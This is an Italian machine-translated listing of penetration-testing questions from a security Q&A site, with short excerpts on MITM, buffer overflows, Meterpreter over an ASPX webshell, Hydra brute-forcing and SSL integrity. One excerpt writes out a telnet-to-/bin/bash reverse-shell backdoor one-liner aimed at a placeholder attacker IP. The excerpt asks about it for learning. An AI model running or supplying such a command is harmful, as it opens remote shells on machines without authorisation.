Domande con tag 'penetration-test'

1
risposta

Man in the Middle attack?

in uno scenario in cui ho un gateway per Internet e uno switch (layer 2) collegato a questo gateway. Ho due computer nello stesso dominio di trasmissione connesso allo switch. tutto il traffico verso Internet deve passare attraverso il gateway....
posta 27.07.2016 - 07:17
3
risposte

(Risolto) Meterpreter su Webshell ASPX

Sono un principiante e ho appena iniziato a lavorare sugli impegni di pentesting. Ho un caso in cui ho un server IIS vittima (senza supporto PHP) dove ho una shell web basata su aspx ( link ) in esecuzione con i diritti utente "iis apppool \ def...
posta 07.08.2016 - 06:45
1
risposta

La mia comprensione dei buffer overflow è corretta?

Sono nuovo al pentesting e mi chiedo se la mia attuale comprensione degli exploit di overflow del buffer sia corretta. Supponendo uno spazio di indirizzamento operativo di 3 indirizzi, uno spazio di istruzioni di 2 indirizzi e un puntatore di is...
posta 25.02.2016 - 16:24
1
risposta

Come è possibile che un'app si connetta all'indirizzo 0.0.0.142 IP? [chiuso]

Esamino periodicamente le connessioni stabilite dalle app nel mio telefono a servizi esterni. Ultimamente, ho trovato Facebook che si connette a 0.0.0.142. Così ho cancellato Facebook per Android. Ora, ho appena scoperto che Instagram si sta con...
posta 29.09.2015 - 15:44
1
risposta

Porta posteriore a guscio inverso

Perché questo esempio di backdoor della shell inversa richiede due ascoltatori? Il listener utilizza il comando nc (nc -l). telnet <attacker_ip> <port_a> | /bin/bash | telnet <attacker_ip> <port_b> Anche se l'esempio...
posta 31.10.2014 - 08:57
1
risposta

Pro / contro del reparto pentest interno rispetto ai pentesters esterni

Quali sono i vantaggi e gli svantaggi di avere un reparto pentest interno in una grande azienda rispetto ai fornitori di servizi esterni?     
posta 13.10.2014 - 21:32
1
risposta

Hydra fornisce risposte sbagliate

Problema: Hydra continua a darmi password errate ogni volta. Sto usando la forza bruta tramite Hydra per indovinare la password corretta su un determinato sito web. Prima di tutto ho usato BurpSuite per intercettare la richiesta della pagina:...
posta 25.11.2013 - 12:52
1
risposta

Aiutare gli sviluppatori a trovare difetti logici e di autorizzazione

I tester di penetrazione professionale di solito sono bravi a trovare tutti i tipi di vulnerabilità, compresi i difetti logici, che sono altamente specifici per il sito in fase di test. Tuttavia, essendo un'attività manuale, i test di penetrazio...
posta 29.10.2013 - 15:59
3
risposte

In che modo SSL protegge da attacchi a livello di rete sull'integrità?

Vorrei sapere se esiste un modo per dimostrare come un utente malintenzionato può attaccare l'integrità di un sito Web a causa di una connessione non crittografata e in che modo SSL lo eviterà. Per quanto riguarda la riservatezza, il seguente...
posta 15.09.2013 - 14:44
2
risposte

Analizza il backend Novell NetWare con server e client Windows

Qualcuno potrebbe fornire alcune informazioni sull'esecuzione di una valutazione della vulnerabilità interna relativa a Novell NetWare come back-end con workstation client e server che eseguono varie versioni di Windows? In sostanza, sto cerc...
posta 15.11.2011 - 16:42